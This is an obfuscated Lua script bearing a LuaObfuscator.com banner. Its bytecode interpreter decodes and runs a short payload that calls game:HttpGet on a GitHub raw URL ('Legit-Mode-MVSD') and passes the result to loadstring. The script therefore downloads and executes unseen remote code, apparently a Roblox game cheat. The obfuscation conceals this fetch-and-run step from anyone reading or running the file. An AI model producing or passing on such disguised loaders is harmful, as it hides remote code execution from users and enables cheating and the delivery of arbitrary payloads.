--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=v2(v0(v30,16));if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0) then v110=v5(v88,v19);v19=nil;v109=1;end end else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0;local v90;while true do if (v89==(0 -0)) then v90=(v31/((5 -(1640 -(1523 + 114)))^(v32-(1 -0))))%((4 -2)^(((v33-((558 + 62) -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v90-(v90%(569 -(367 + (286 -85)))) ;end end else local v91=927 -(214 + 713) ;local v92;while true do if (v91==0) then v92=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and 1) or (877 -(282 + (1660 -(68 + 997)))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=(1308 -(87 + 263)) -(892 + 65) ;end if (v35==(1 + 0)) then return (v37 * (57 + 199)) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -(1713 -(802 + 150)))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1,53 -33 ) * ((3 -1)^(24 + 8))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -56 );local v47=((v20(v43,19 + 13 )==(1 -0)) and  -(431 -(44 + (1271 -(261 + 624))))) or (1188 -(1069 + 118)) ;if (v46==(0 -0)) then if (v45==(0 -(0 -0))) then return v47 * (0 + 0) ;else local v111=0 + 0 ;while true do if (v111==(0 -0)) then v46=4 -3 ;v44=(1080 -(1020 + 60)) + 0 ;break;end end end elseif (v46==((3454 -(630 + 793)) + (53 -37))) then return ((v45==(0 -0)) and (v47 * ((3 -(9 -7))/(791 -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-(2520 -1497) ) * (v44 + (v45/((1 + 1)^(163 -111)))) ;end local function v25(v48) local v49;if  not v48 then local v93=0 + 0 ;while true do if (v93==(0 -0)) then v48=v23();if (v48==(1747 -(760 + 987))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((659 + 1255) -(1789 + 124)) );v18=v18 + v48 ;local v50={};for v66=767 -(745 + 21) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101) local v94=(function() return 0 + 0 ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v94== #"|") then if (v95== #"]") then v96=(function() return v97()~=(0 -0) ;end)();elseif (v95==(5 -3)) then v96=(function() return v98();end)();elseif (v95== #"xnx") then v96=(function() return v99();end)();end v100[v101]=(function() return v96;end)();break;end if (v94~=(0 -0)) then else local v117=(function() return 0 + 0 ;end)();local v118=(function() return;end)();while true do if (v117==0) then v118=(function() return 0 + 0 ;end)();while true do if (1~=v118) then else v94=(function() return  #" ";end)();break;end if ((0 + 0)==v118) then v95=(function() return v97();end)();v96=(function() return nil;end)();v118=(function() return 397 -(115 + 281) ;end)();end end break;end end end end return v94,v95,v96,v97,v98,v99,v100,v101;end;end)();local v52=(function() return function(v102,v103,v104) local v105=(function() return 0 -0 ;end)();local v106=(function() return;end)();while true do if (v105==0) then v106=(function() return 0 + 0 ;end)();while true do if (v106~=(0 -0)) then else local v125=(function() return 0 + 0 ;end)();while true do if ((1384 -(746 + 638))==v125) then v102[v103-#"]" ]=(function() return v104();end)();return v102,v103,v104;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"<",v57 do FlatIdent_17196,Type,Cons,v21,v24,v25,v58,v68=(function() return v51(FlatIdent_17196,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"-19"]=(function() return v21();end)();for v69= #" ",v23() do local v70=(function() return 0 -0 ;end)();local v71=(function() return;end)();while true do if (v70==0) then v71=(function() return v21();end)();if (v20(v71, #"!", #":")==(341 -(218 + 123))) then local v121=(function() return 0 -0 ;end)();local v122=(function() return;end)();local v123=(function() return;end)();local v124=(function() return;end)();while true do if (v121~=(10 -7)) then else if (v20(v123, #"nil", #"-19")~= #"|") then else v124[ #".com"]=(function() return v58[v124[ #".dev"]];end)();end v53[v69]=(function() return v124;end)();break;end if (v121~=(868 -(550 + 317))) then else v124=(function() return {v22(),v22(),nil,nil};end)();if (v122==0) then local v130=(function() return 0;end)();local v131=(function() return;end)();while true do if (v130==(0 -0)) then v131=(function() return 0 + 0 ;end)();while true do if (v131==(560 -(306 + 254))) then v124[ #"19("]=(function() return v22();end)();v124[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v122== #":") then v124[ #"-19"]=(function() return v23();end)();elseif (v122==2) then v124[ #"xnx"]=(function() return v23() -((2 -0)^(44 -28)) ;end)();elseif (v122== #"asd") then local v180=(function() return 0 + 0 ;end)();while true do if (v180~=(285 -(134 + 151))) then else v124[ #"xxx"]=(function() return v23() -((1667 -(970 + 695))^(30 -14)) ;end)();v124[ #"http"]=(function() return v22();end)();break;end end end v121=(function() return 1992 -(582 + 1408) ;end)();end if (v121~=(6 -4)) then else if (v20(v123, #"[", #"~")== #"]") then v124[2 -0 ]=(function() return v58[v124[2]];end)();end if (v20(v123,7 -5 ,292 -(60 + 230) )~= #"~") then else v124[ #"asd"]=(function() return v58[v124[ #"19("]];end)();end v121=(function() return 3;end)();end if (v121==0) then local v127=(function() return 1824 -(1195 + 629) ;end)();while true do if (v127~=(0 -0)) then else v122=(function() return v20(v71,1 + 1 , #"xnx");end)();v123=(function() return v20(v71, #"http",247 -(187 + 54) );end)();v127=(function() return 1457 -(282 + 1174) ;end)();end if (v127==1) then v121=(function() return 781 -(162 + 618) ;end)();break;end end end end end break;end end end for v72= #">",v23() do v54,v72,v28=(function() return v52(v54,v72,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[812 -(569 + 242) ];local v64=v60[5 -3 ];local v65=v60[1 + 2 ];return function(...) local v73=v63;local v74=v64;local v75=v65;local v76=v27;local v77=1025 -(706 + 318) ;local v78= -(1252 -(721 + 530));local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v107=0,v81 do if (v107>=v75) then v79[v107-v75 ]=v80[v107 + (2 -1) ];else v83[v107]=v80[v107 + 1 + 0 ];end end local v84=(v81-v75) + (701 -(271 + 429)) ;local v85;local v86;while true do local v108=0 + 0 ;while true do if ((3244>=1055) and (v108==(1 + 0))) then if ((v86<=(1506 -(1408 + 92))) or (3313<=1778)) then if (v86<=(1088 -(461 + 625))) then if (v86<=(1288 -(993 + 295))) then local v134=v85[1 + 1 ];v83[v134]=v83[v134](v13(v83,v134 + (1172 -(418 + 753)) ,v78));elseif ((v86==1) or (1421>=2104)) then v83[v85[1 + 1 ]]();else v83[v85[1 + 1 ]]=v85[3];end elseif ((1812<=3249) and (v86<=4)) then if (v86==3) then v83[v85[1 + (2 -1) ]]();else local v139=0 + 0 ;local v140;local v141;while true do if (v139==(530 -(406 + 123))) then v83[v140 + (1770 -((4483 -2734) + 20)) ]=v141;v83[v140]=v141[v85[1 + 3 ]];break;end if (v139==0) then v140=v85[1324 -(1249 + 73) ];v141=v83[v85[2 + 1 ]];v139=1146 -((2017 -(1126 + 425)) + 679) ;end end end elseif ((1623<=1957) and (v86==(11 -6))) then local v142=0 -(405 -(118 + 287)) ;local v143;local v144;local v145;local v146;while true do if (v142==(1901 -(106 + 1794))) then v78=(v145 + v143) -(1 + 0) ;v146=0 + (0 -0) ;v142=2;end if ((4412==4412) and (v142==((1121 -(118 + 1003)) -0))) then v143=v85[5 -3 ];v144,v145=v76(v83[v143](v13(v83,v143 + (2 -(378 -(142 + 235))) ,v85[3])));v142=1;end if (v142==(116 -(4 + 110))) then for v181=v143,v78 do v146=v146 + (585 -(57 + 527)) ;v83[v181]=v144[v146];end break;end end else v83[v85[1429 -(41 + 1386) ]]=v85[106 -(17 + 86) ];end elseif (v86<=(7 + 2)) then if (v86<=(14 -7)) then do return;end elseif (v86==8) then local v149=0;local v150;while true do if (v149==((0 -0) -0)) then v150=v85[(37 + 131) -((1099 -(553 + 424)) + (83 -39)) ];v83[v150]=v83[v150](v13(v83,v150 + (1 -0) ,v78));break;end end else local v151=0 -0 ;local v152;local v153;while true do if (v151==1) then v83[v152 + 1 + 0 ]=v153;v83[v152]=v153[v85[1 + 3 ]];break;end if (v151==(0 -0)) then v152=v85[67 -(30 + 35) ];v153=v83[v85[3 + 0 ]];v151=1 + 0 ;end end end elseif (v86<=(11 + 0)) then if (v86==(1267 -(1043 + 214))) then do return;end else v83[v85[7 -5 ]]=v62[v85[1215 -(323 + 889) ]];end elseif (v86>(31 -19)) then v83[v85[(339 + 243) -(361 + 219) ]]=v62[v85[323 -(53 + 114 + 153) ]];else local v158=0 + 0 ;local v159;local v160;local v161;local v162;while true do if ((1750>=842) and (((236 + 177) -(15 + 398))==v158)) then v159=v85[984 -(18 + 964) ];v160,v161=v76(v83[v159](v13(v83,v159 + (3 -2) ,v85[3])));v158=1 + 0 ;end if ((4372>1850) and (v158==(1 + (0 -0)))) then v78=(v161 + v159) -(851 -(20 + (2312 -1482))) ;v162=0;v158=2;end if (v158==(2 + 0)) then for v184=v159,v78 do v162=v162 + (127 -((259 -143) + 10)) ;v83[v184]=v160[v162];end break;end end end v77=v77 + 1 + 0 ;break;end if (v108==(738 -(542 + 196))) then v85=v73[v77];v86=v85[1];v108=1 -0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403563Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F64717469787A2F4C656769742D4D6F64652D4D5653442F726566732F68656164732F6D61696E2F50726F6A65746F2532304C4B4200083Q00120D3Q00013Q00120D000100023Q002009000100010003001206000300044Q0005000100034Q00085Q00022Q00013Q000100012Q000A3Q00017Q00",v9(),...);
